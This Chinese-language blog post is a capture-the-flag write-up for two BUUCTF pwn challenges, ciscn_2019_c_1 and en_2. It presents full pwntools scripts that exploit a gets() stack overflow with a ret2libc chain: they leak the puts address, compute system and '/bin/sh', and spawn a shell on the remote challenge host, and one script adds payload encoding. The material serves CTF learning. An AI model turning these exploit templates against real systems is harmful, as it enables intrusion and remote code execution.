Pwn_buuctf_ciscn_2019_c_1

最新推荐文章于 2022-06-24 11:00:38 发布
最新推荐文章于 2022-06-24 11:00:38 发布
阅读量449 收藏
点赞数
分类专栏: Pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YangZiTrick/article/details/109814025
版权

Pwn_buuctf_ciscn_2019_c_1

libc64

ida查看

在这里插入图片描述
在main函数没有发现明显漏洞
跟进encrypt()函数
在这里插入图片描述

发现了gets()和puts()函数,可以利用gets的栈溢出泄漏出puts的地址,从而找到libc版本信息getshell

ret用ROPgadget找

exp:

from pwn import *
from LibcSearcher import *
p= remote('node3.buuoj.cn',25412)
#p= remote('127.0.0.1',12345)
#p = process('./ciscn_2019_c_1')
#binsh_addr = 0x0804a028 # ROPgadget --binary level1  --string '/bin/sh'
ret = 0x4006b9
elf = ELF('./ciscn_2019_c_1')
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
main_addr = elf.symbols['main']
pop_rdi = 0x400c83

p.sendline('1')
p.recvuntil('encrypted')
payload = 'a' * 0x58 + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main_addr)
p.sendline(payload)
p.recvuntil('Ciphertext\n')
#p.recvline()
p.recvuntil('\n')
puts_addr = u64(p.recv(6).ljust(8,b'\x00'))
print(hex(puts_addr))



libcbase = puts_addr - 0x0809c0	
sys_addr = libcbase + 0x04f440	
bin_sh = libcbase + 0x1b3e9a	

p.recv()
p.sendline('1')
p.recvuntil('encrypted')
payload = 'a'*0x58+p64(ret)+p64(pop_rdi)+p64(bin_sh)+p64(sys_addr)
p.sendline(payload)

p.interactive()

也不知道为什么payload居然可以绕过了程序的加密?

Pwn_buuctf_ciscn_2019_en_2

libc64

和上面c_1一样,只不过这次发送payload的时候需要加密

exp:

from pwn import *
from LibcSearcher import *
p=remote('node3.buuoj.cn',28459)
elf = ELF('./ciscn_2019_en_2')
main_addr = 0x400B28
pop_rdi = 0x400C83
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']
def encrypt(payload):
    l = list(payload)
    for i in range(len(l)):
        if l[i].isdigit():
            l[i] = chr(ord(l[i])^0xc)
        elif l[i].isupper():
            l[i] = chr(ord(l[i])^0xd)
        elif l[i].islower():
            l[i] = chr(ord(l[i])^0xe)
    return ''.join(l)
p.recv()
p.sendline('1')
p.recvuntil('encrypted\n')
payload = 'a'*88 + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main_addr)

p.sendline(encrypt(payload))
p.recvuntil('Ciphertext\n')
p.recvuntil('\n')
puts_addr = u64(p.recv(6).ljust(8,'\x00'))
print(hex(puts_addr))
libc = LibcSearcher('puts',puts_addr)
p.recv()
p.sendline('1')
p.recvuntil('encrypted\n')
libcbase = puts_addr - 0x0809c0
sys_addr = libcbase + 0x04f440
bin_sh = libcbase + 0x1b3e9a
ret = 0x4006b9
payload2 = 'a'*88+p64(ret)+p64(pop_rdi)+p64(bin_sh)+p64(sys_addr)
p.sendline(payload2)
p.interactive()
_Trick_
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BUUCTF - PWNciscn_2019_c_1
古月浪子的博客
03-20 4078
checksec一下 IDA打开看看,encrypt函数内存在栈溢出漏洞 由于程序会将输入的内容加密,这会破坏我们的payload,所以注意到strlen函数,通过在payload开头放上 \0 来绕过加密 由于程序内没有后门函数,也没有system函数,所以考虑ret2libc 特别注意到题目是部署在Ubuntu18上的,因此调用system需要栈对齐,这里填充ret来对齐 from pwn...
BUUCTF pwn ciscn_2019_n_8
菜的只能随便写写博客
02-03 2622
0x01 文件分析  文件很简单,32位,保护都开得差不多。   0x02 运行  输入并且回显。   0x03 IDA源码分析 int __cdecl main(int argc, const char **argv, const char **envp) { int v4; // [esp-14h] [ebp-20h] int v5; // [esp-10h] [ebp-1Ch] ...
buuctf pwn ciscn_2019_c_1
qq_58402603的博客
10-20 594
首先基本操作: 先对文件进行checksec和file查看 然后使用ida进行静态分析,找到main函数后按F5观察伪代码 发现是一个加密程序 然后按shift+F12进行字符串的查找,发现没有 /bin/sh字符串,因此我们只能利用libcsearch库中的system函数来完成此题,可以对puts函数进行地址泄露。 对主函数中调用的函数进行查看,可以发现encrypt函数中有gets()函数,可以在这里进行栈溢出攻击 双击s查看字符串s所分配的内存大小可以发现,一共占50...
PWN|ciscn_2019_c_1
l2645470582_的博客
02-28 419
1.检查保护机制 (1)开启堆栈保护 (2)64位文件 2.用64位IDA打开该文件 (1)shift+f12查看关键字符串 没有看到后面函数(system等) (2)进入mian函数 int __cdecl main(int argc, const char **argv, const char **envp) { int v4; // [rsp+Ch] [rbp-4h] BYREF init(argc, argv, envp); puts("EEEEEE...
BUUCTF-Pwn-ciscn_2019_c_1
餐桌上的猫
02-14 3632
题目截图 检查一下文件信息 开启了NX,64位的文件 使用IDA打开 按shift+F12查看字符串,没有找到“flag”和“/bin/sh”类似的字符串 一番寻找也没有找到system函数 查看函数导入表找到了puts函数和gets函数,说明使用了libc动态库,可以从这里入手 找到gets函数所在位置查看 在函数encrypt中使用了gets函数,存在栈溢出,点击encrypt函数的名称,按x检查交叉引用 双击进入查看调用函数 运行程序可以了解到,该程序的功能是对字符串进行加密和解密,这段代码
[BUUCTF-pwn]——ciscn_2019_c_1
Y_peak的博客
02-07 1226
[BUUCTF-pwn]——ciscn_2019_c_1 题目地址:https://buuoj.cn/challenges#ciscn_2019_c_1 题目: 下载下来checksec一下 再IDA上面看一下,利用shift + f12看下字符串,发现没有我们想要的字符串。以为是ret2shellcode,结果弄了半天不可以。重新看一遍发现开启了NX保护,原来是ret2libc类型的,呜呜呜。 ...
CTF-PWN-buuctf-ciscn_2019_c_1-ret2libc的典型使用
serfend's blog
04-15 2425
CTF-PWN 来源:https://buuoj.cn/challenges 内容: 附件:https://pan.baidu.com/s/1ENhfN3jAV0TAUKpEIeZ7zw?pwd=2n64 提取码:2n64 答案:flag{e8165d23-782e-47fd-9c16-0a002b1f08bd} 总体思路 发现加密位置,判断其溢出点 通过设置第一个字符为\0以让strlen返回0,从而避免payload被破坏 构造执行,溢出获取puts的地址,从而得到libc版本 再次溢出,执行获取sh
日行一PWNciscn_2019_c_1不给出libc题型
m0_57221101的博客
06-02 798
BUUCTF ciscn 依旧使用buu提供的题这次大体和上次babyrop一样,都是使用源程序中不存在的函数来进行攻击,区别在于此次没有给出libc的版本,我们需要自己暴漏libc的版本以及本次的64位程序,在传参上和32位程序的一些不同闲话少叙,后面需要的知识点我们后面再学,我们便分析边聊checksec分析64位的程序,只有数据段免执行保护。地址为0000000000400B28我们可以通过telnet连接一下看看她在干什么可以看到是一个简单的输入判断
BUUCTF-PWN ciscn_2019_final_5(临界条件错误,劫持GOT表项)
weixin_44145820的博客
04-14 1050
目录题目分析漏洞分析漏洞利用Exp 题目分析 例行安全检查 没有PIE,方面调试 partial relro意味着这题应该直接改GOT表就能做 菜单: 没有show功能,可以考虑吧某个函数(比如free的GOT)改为puts@plt 可以申请17个chunk,编号为0-16 每次分配结束后会显示分配内存的低12bits 而本题中还有一个特殊的地方,就是content数组(0x6020e0)...
Buuctf(PWN)ciscn_2019_c_1
半岛铁盒的博客
03-22 1328
一个普通的小程序,给了3个选项来供我们选择; 在main函数进行分析,发现输入 1 是正确的通道; 点进去下面的encrypt() 加密函数; 在这里发现了 gets()溢出函数; 我们可以利用这个函数漏洞来构建我们的payload; 紧接着下面 就会对 我们输入的payload 进行加密操作会破坏我们的payload; 我们需要避免这种情况; 看第14行有个 if ( v0 >= strlen(s) ); 当不满足条件时会退出 while 循环; 我们要借此利用这个 if ..
buuctf ciscn_2019_c_1 wp
n1ptune__的博客
05-02 398
记录下学习pwn的过程(感觉比re难多了,我太菜了) 查看保护 64位程序,64位程序 的前六个参数依次保存在 RDI, RSI, RDX, RCX, R8 和 R9,多的参数再通过栈传递 在encrypt函数里使用了gets函数,可能有栈溢出 发现对输入进行了加密 可以使用“\0”绕过 构造rop链,需要使用到rdi传递参数,又因为是ubuntu18所以需要栈对齐,使用到一个ret from pwn import * from LibcSearcher import * p=remote("node
BUUCTF-PWNciscn_2019_c_1
qcwwww的博客
05-07 436
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 checksec一下 新的改变 我们对Markdown编辑器进行了一些功能拓展与语法支持,除
buuctf-pwn write-ups (1)
CoLin的pwn小屋
05-01 432
buuctf-pwn 001-016题wp
buuctf-pwn write-ups (4)
CoLin的pwn小屋
06-12 519
buuctf 032-038题题解,重点关注038题 pwnable_orw
buuctf-pwn write-ups (2)
CoLin的pwn小屋
05-07 283
buuctf-pwn 017-026题wp,重点关注babyheap
BUUCTF-PWN-Writeup-1-5
feng的博客
01-20 3222
前言 开始刷一刷BuuctfPWN题,一遍学一遍刷题了。 其实主要是堆学的顶不住了。。。一个下午才搞懂一个知识点,太tm的难了。 test_your_nc from pwn import * from LibcSearcher import * context(log_level="debug",os="linux") p = remote('node4.buuoj.cn',27517) p.interactive() rip 坑。。。。 一个gets的栈溢出,后门函数fun()在0x401186,本
buuctf-pwn write-ups (3)
CoLin的pwn小屋
05-15 276
buuctf pwn 027-031题
buuctf-pwn write-ups (5)
CoLin的pwn小屋
06-17 243
buuctf-pwn 039~046题
buuctf-pwn write-ups (6)
CoLin的pwn小屋
06-24 1146
buuctf-pwn 047~053题,重点关注第53题的C++ pwn
buuctf [HarekazeCTF2019]baby_rop2
最新发布
09-30
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2是一个pwn题目。在这个题目中,主要的目标是获取read函数的地址,并利用该地址泄漏libc基址,然后计算system函数和/bin/sh字符串的地址,最终执行system('/bin/sh')获取shell权限。解题的过程中,通过找到rsi寄存器的地址,将其设置为read函数的地址,然后再通过调用printf函数,将read函数的地址泄漏出来,从而计算libc基址。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值